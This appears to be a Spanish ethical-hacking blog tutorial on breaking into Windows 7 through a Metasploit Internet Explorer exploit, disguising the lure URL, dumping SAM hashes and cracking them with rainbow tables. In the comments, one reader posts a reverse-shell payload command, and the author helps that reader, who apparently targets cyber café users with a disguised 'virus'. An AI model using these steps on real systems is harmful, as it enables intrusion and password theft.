RSS |

Blog de Omar

Just another WordPress weblog

Advertisement

Chequen esta conversación que casi siempre se repite cada vez que realizo alguna presentación sobre Ethical Hacking, presten mucha atención:

***********************************
Participante: Hola Omar, esta chevere toda la presentación.
Omar: Hola gracias, que bueno que te este gustando – siempre me he preguntado que pasaría si alguien me dijera lo contrario: “Esta horrible esto”.
Participante: Omar…. tengo una duda…. lo que has hecho en Windows 2003 funciona también en Windows 7?
Omar: Pues si funciona, de hecho cambian algunos detalles pero en esencia es lo mismo. Claro que funciona.
Participante: Ahhhh ok. ¿Y como haría eso? – me suelen decir. 
Omar: No es difícil , utiliza otro exploit, uno que sirva para Windows 7 y eso es todo.
Participante: Una última pregunta …. y que pasaría si:  el servidor a vulnerar tiene un firewall que bloquea todos los puertos, tiene un HIPS, tiene un IPS/IDS delante de ellos, tiene configurado HTTPS (si es que estuviéramos hablando de sniffing o algo parecido), como haríamos en ese caso?
Omar: Pues toca buscar otros caminos,  no siempre se debe hacer lo mismo – eso le termino respondiendo, en realidad algo aturdido después de una pregunta que envolvía 20 o más subpreguntas en realidad.
***********************************

Bueno para realizar ejemplos y pruebas de concepto de Ethical Hacking en conferencias, cada quien tiene su estilo, yo suelo mezclar muchas plataformas – como habrán notado en mis videos – desde Windows XP hasta Android, pero hoy voy a tratar, de alguna manera, responder esa serie de preguntas que comienzan con “Y que pasaría si…?” , hoy vamos a ver como crackear Contraseñas en Windows7, lo vamos a comprar contra la manera de hacerlo en versiones anteriores y finalmente le vamos a poner algo más de diversión complicando un poco el asunto. (que es uno de los sistemas operativos más usados en la actualidad, ya no lo vamos hacer con Windows XP como lo hice en este VIDEOTUTORIAL).

Auditando complejidad de contraseñas en Windows 7
Para obtener acceso a esta versión de sistema operativo, se me ocurre que podemos aprovecharnos de una vulnerabilidad en Internet Explorer, ejecutaremos los siguientes comandos en nuestro Backtrack 5.

1.- Escogemos el exploit y configuramos el payload de conexión reversa.

2

2.-  En la máquina con Windows 7, se debe abrir la URL generada por Metasploit  con Internet Explorer y se abrirá nuestra primera sesión Meterpreter, se puede enmascarar la URL con algún servicio tipo Shorturl.

3

4

3.- Elevamos privilegios tipo “System” y obtenemos la SAM con el listado de usuarios y contraseñas.

7

Ya lo expliqué en el VIDEOTUTORIAL que hice sobre este tema sobre XP pero he colocado flechitas para explicar que es lo que significa cada una de las partes encontradas y que se encuentran separadas por dos puntos ( : ).
Sin embargo hay algo novedoso en Windows 7, algo distinto en comparación de Windows XP y Windows 2003, analicemos con calma lo que ocurre:

  • Todos los LM Hash en Windows 7 son iguales, ¿lo notaron? lo que ocurre es que ya no se usa LM Hash en Windows 7
  • Lo que si cambia son los NTLM Hash y esto es más complejo para obtener las contraseñas debido a que no tiene todas las vulnerabilidades de LM Hash (que fueron explicados en este VIDEOTUTORIAL)

4.- ¿Entonces como hacemos para poder auditar las contraseñas que trabajan con NTLM Hash? Tenemos 02 opciones:

  • Usamos Rainbow Tables especialmente diseñadas para NTLM, las mismas se pueden descargar desde aquí: http://ophcrack.sourceforge.net/tables.php, en este ejemplo se usará el que dice VISTA FREE y pesa 461 MB, hay otros que te permiten obtener contraseñas de mayor complejidad pero esta página los vende.

8

Después de descargado el archivo, lo configuramos para que trabaje con el software OPHCRACK que usa Rainbow Tables y listo, eso es todo, así podremos obtener las contraseñas en texto plano.

IMPORTANTE:
Entre más compleja sea la contraseña, mayor será la Rainbow Tables que necesitemos para obtener la misma en texto plano; hay Rainbow Tables de mas de 134GB pero para esta prueba hemos usado la tabla más simple.

 

10

En la imagen superior podemos observar como se obtuvo las contraseñas más débiles para para ciertos usuarios, las contraseñas que no se pudieron obtener se deben a que tienen una contraseña compleja que requiere de Rainbow Tables más grandes.

 

  • Finalmente, la última manera de obtener la contraseña es a través del análisis ONLINE que existen en ciertas páginas web, por ejemplo en esta:  http://www.md5decrypter.co.uk, aquí es mucho más sencillo pero no siempre podremos encontrar las contraseñas si es que la misma es compleja y no están en la Base de Datos que utiliza la página, sin embargo esta vez hemos tenido suerte y hemos encontrado contraseñas que con la Rainbow Tables no lo hicimos.

9

Conclusiones y recomendaciones para prevenir esto:

  • NTLM usa un algoritmo de hash mucho más potente que LM Hash, por lo que obtener la contraseña es más complejo.
  • Utiliza siempre contraseñas complejas, de más de 8 o 9 caracteres y que contengan mayúsculas, con esto evitarás que tu contraseña pueda ser expuesta.
  • Las Rainbow Tables siguen siendo la mejor opción para obtener las contraseñas de NTLM Hash, sin embargo, se requieren de Rainbow Tables muy grandes para poder tener éxito
  • Finalmente, se recomienda que para auditar la robustez de las contraseñas, se usen los 02 métodos descritos arriba: Rainbow Tables y el análisis ONLINE.

* * * * * * * * * * * * * * * * * * * * *

Popularity: 80% [?]

Si te gusto este post, asegurate de suscribirte a mi RSS feed!

Omar Palomino

Hola mi nombre es Omar Palomino. Si te gustan las noticias de mi blog, no olvides suscribirte a la página. Puedes leer más en Acerca de MI, o bien ponerte en contacto conmigo al correo: omarc320@gmail.com

More Posts - Website

Post Relacionados

SI TE GUSTO ESTE ARTICULO, COMPARTELO!


Comments

There are 15 comments for this post.

  1. Martin on Reply to this comment Agosto 7, 2012 7:30 pm

    Hola Omar. Nuevamente te digo que esta exelente el post.
    espero que ganes en el concurso de los 20 blog.
    esta vez comento para pedirte algo qu me gustaria que lo expliques vos pq entiendo mejor xD
    Quisiera saver los metodos que hay para sacar una Direccion Ip , pero que sea de un usuario de facebook intento auditorial con wireshark pero termino sakando la ip de facebook :S no la del usuario
    Sorry. por publicarte esto aca xD. la proxima te mando un email :P

    Suerte y Segui asi con el blog :P

  2. Omar Palomino on Reply to this comment Agosto 9, 2012 7:59 am

    @Martin, gracias por comentar a través del blog, hazlo siempre así.
    Respecto a tu pregunta, no existe manera de poder encontrar la IP pública de una persona con la que conversas por Facebook, lo único que vas a lograr es siempre obtener la IP pública del servidor de Facebook. Te sugiero que busques otras maneras si es que deseas conseguir la misma, deberías evaluar el uso de ingeniería social.

    Saludos,

  3. nmaapp on Reply to this comment Agosto 9, 2012 8:04 am

    Hola amigo Omar, te felicito por esos excelentes tutos.
    Esta es la primera vez que te escribo y desearía que me ayudaras con algo.
    Te estaría completamente agradecido ya que es meramente educativo.

    Necesito que me ayudes en que:
    Fíjate que tengo un problema con conexiones externas.
    Cuando utilizó metasploit dentro de mi misma red me funciona, pero cuando lanzo el exploit fuera de mi misma red o sea al exterior no me funciona,
    Ya cree un dominio en no-ip para poder tener una ip PUBLICA.

    Cuando le hago ping al dominio creado desde el exterior me tira la ip del router que seria la ip PUBLICA, esto quiere decir que si funciona.
    A esto quiero llegar, cuando estoy haciendo el virus con el payload Windows/meterpreter/reverse_tcp . ¿Le tengo que poner en lhost=el dominio?, estuve por algunos foros y vi que en lhost colocaban el dominio creado en no-ip y abri los puertos necesarios en el Router e hice indetectable el virus. Pero estuve intentando con este método y no me funcionó, la verdad no se cual es el problema.

    En pocas palabras lo que te quiero decir es como AUDITAR y revisar vulnerabilidad de un ordenador que este fuera de mi red local utilizando metasploit.

    Yo utilizo Linux 2.6.31 – 2.6.35 es el ditro blackbuntu

    Por favor si me puedes contestar lo mas rápido posible te estare muy agradecido ya que es una investigación de la Universidad.

    Te saluda nmaapp@gmail.com
    Hasta pronto.

  4. Omar Palomino on Reply to this comment Agosto 9, 2012 8:09 am

    @nmaapp, gracias por comentar, aquí mis comentarios:

    1.- Debes usar un payload de conexion reversa, para que sea el PC vulnerado el que realice una conexión externa.
    2.- Lo que mencionas sobre la IP pública, es un tema de redes, tu IP pública siempre sera la del router y nunca será la de tu Bactrack a menos que hagas un NAT en el router.

    Para explicarme mejor, dos conexiones de IP pública siempre llegan a un router y si se quiere que llegue a algun dispositivo interno se debe hacer NAT en el modem/router ADSL.

    Saludos,

  5. nmaapp on Reply to this comment Agosto 10, 2012 8:00 am

    Hola que tal omar-Palomino, un saludo y gracias por responder.

    ¿Dices que tengo que usar un payload de conexión reversa?

    ¿Como el payload Windows/meterpreter/reverse_tcp?

    Si es este ya lo he utilizado y no hace conexion fuera de mi red local, pero si lanzo el exploit dentro de mi misma red si funciona.

    Ya lo he intentado en Cyber, dejo lanzado el exploit (Modo de escucha) y me voy para un Cyber, abren el virus compilado con un docx y cuando llego a mi casa no ha hecho la conexión reversa.

    Y si dices que cuando la victima ejecute el virus tiene que hacer la conexión externa, dime que es lo que hago mal para así corregirlo .

    CODIGO DE CONEXIÓN INVERSA

    Payload Windows/meterpreter/reverse_tcp lhost=(ip privada)(Aquí que ip pongo?, si la del router o la de la maquina local) lport=(4444)(aquí que puerto puedo poner para que sea mas eficaz para la conexión externa) x > virus.exe

    De antemano te agradezco por tu colaboración.

    Y te animo que sigas con tus tutoriales ya que son de mucha ayuda.

  6. Omar Palomino on Reply to this comment Agosto 10, 2012 8:03 am

    @nmaapp, por lo que escribes puedo ver que lo que falta es hacer NAT en el modem/router de tu casa sino nunca la conexión reverse llegará a tu Backtrack. Tu router tiene configurado NAT?

    Saludos,

  7. Martin on Reply to this comment Agosto 10, 2012 9:47 am

    Hola Omar,

    Sigo Todo el Tutorial todo Bien pero al momento de abrir el link en el navegador
    No hace nada.
    nose que pueda ser :S
    lo eh intentado varias veces. y la ultima vez me salio algo. apenas este en mi pc.
    le sako una foto a la consola y te la posteo aca en el blog.

    Un Zaludo .!

  8. Omar Palomino on Reply to this comment Agosto 12, 2012 9:12 pm

    @Martin, gracias por comentar, no sé que puede pasar, lo único que se me ocurre es que de pronto el máquina donde estas tratando de ejecutar el exploit tiene aplicado el parche que soluciona la vulnerabilidad.

    Envíanos la imagen para ver que ocurre y como te podemos ayudar.

    Saludos,
    Omar

  9. Francisco on Reply to this comment Agosto 16, 2012 10:58 am

    Buenas tardes desde España. Primero decirte que hace poco empece a trabajar con las practicas de tu blog. Me ayudan muchísimo. Gracias por lo que haces. Bueno, me surge una duda referente a tu post de Crackear pass en W7. Al lanzar el exploit, el navegador me da el error 404.not round y en el backtrack, me dice lo siguiente…unknown user-agent mozilla/5.0 (compatible;MSIE 9.0;Windows NT 6.1; WOW64; Trident/5.0; NP06)

    Me podrías decir que ha fallado? Anule todos los Av y firewall…estoy perdido…bueno…me despido Omar…sigue con tu trabajo!!! Enhorabuena!

  10. Omar Palomino on Reply to this comment Agosto 16, 2012 2:22 pm

    @Francisco, dos posibles motivos:

    1) El exploit funciona si no tienes instalado el parche sacado por Windows, por favor verifica si tienes instalada la actualización.
    2) El exploit se aprovecha de una vulnerabilidad de Internet Explorer y por lo que enviaste pareceriera que lo estas cargando con Firefox.

    Me cuentas como te va despues de esto.

    Saludos y gracias por comentar.

    Omar

  11. Francisco on Reply to this comment Agosto 17, 2012 1:40 am

    Ok, y como puedo saber si esta parcheado el sistema?

    Un saludo

  12. Omar Palomino on Reply to this comment Agosto 19, 2012 9:02 pm

    @Francisco, si estas haciendo una prueba con tu propio computador verifica los parches aplicados si estas revisando otro que no es tu computador la única manera es revisando es sabiendo si le dio click al enlace.

    Saludos,

  13. cr0w on Reply to this comment Agosto 27, 2012 9:07 pm

    HOla Omar, sabes de alguna herramienta para enumerar las hashes en una LAN que no sea CAIN&Abel, l0ptcrack u ophcrack ? , la idea es hacer el barrido para recolectar la mayoria de los hashes y asi poder auditar dichas cuentas y tratar de crackearlas como practica de ethical haking saludos cordiales

  14. Omar Palomino on Reply to this comment Septiembre 16, 2012 10:04 pm

    @cr0w, la única manera de obtener los hashes es teniendo elevados privilegios de manera local, he visto scripts desarrollado en VS pero igual toca ejecutarlo de manera local.

    Saludos,

    Omar

  15. Julián Andrés Forero Rodríguez on Reply to this comment Agosto 2, 2014 2:03 pm

    ¿Qué tal, Omar?

    Sigo con mucho entusiasmo su blog. Es uno de los pocos sitios de calidad en español de estos temas, con todo el contexto teórico que conlleva la Seguridad Informática. Quería plantearle una duda, y es que al momento de ya obtener control con el meterpreter, no he podido escalar privilegios para que podamos utilizar el hashdump. He leído que se puede migrando a otro proceso, pero en mi sistema vulnerable, en su lista de procesos no aparecen los de tipo System. Quisiera por favor me ayudara con estas inquietudes porque es muy interesante este tema. De nuevo, gracias.

Write a Comment

*

Spam Protection by WP-SpamFree